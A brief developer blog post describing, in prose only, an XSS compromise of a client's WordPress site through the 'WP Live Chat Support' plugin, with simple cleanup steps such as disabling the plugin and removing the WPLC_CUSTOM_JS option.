Fixed My First XSS Attack

Yesterday, one of my clients got his website hacked and showed Adware on it which was pretty harming to his business and his website.

After thorough investigation, I found it was an XSS attack which injected a JavaScript into his website that redirects visitors to the ads. But the dangerous part was it created an ADMIN account when you login as an admin, then it hijacked the nonce credentials and created an admin user which was very very dangerous.

The disturbing part, it was due to a very famous WordPress plugin called “WP Live Chat Support” that didn’t implement security in a responsible way. If you are using it please deactivate it immediately until it is fixed (Although it is banned by now)

If you are looking for more info about what is XSS, you can watch this video: https://www.youtube.com/watch?v=L5l9lSnNMxg

Some steps for developers:

  • Disable the “WP Live Chat Support” plugin
  • Go to the options table & remove “WPLC_CUSTOM_JS” field
  • Make sure you don’t have any suspicious JavaScript code from an unknown Third-Party host.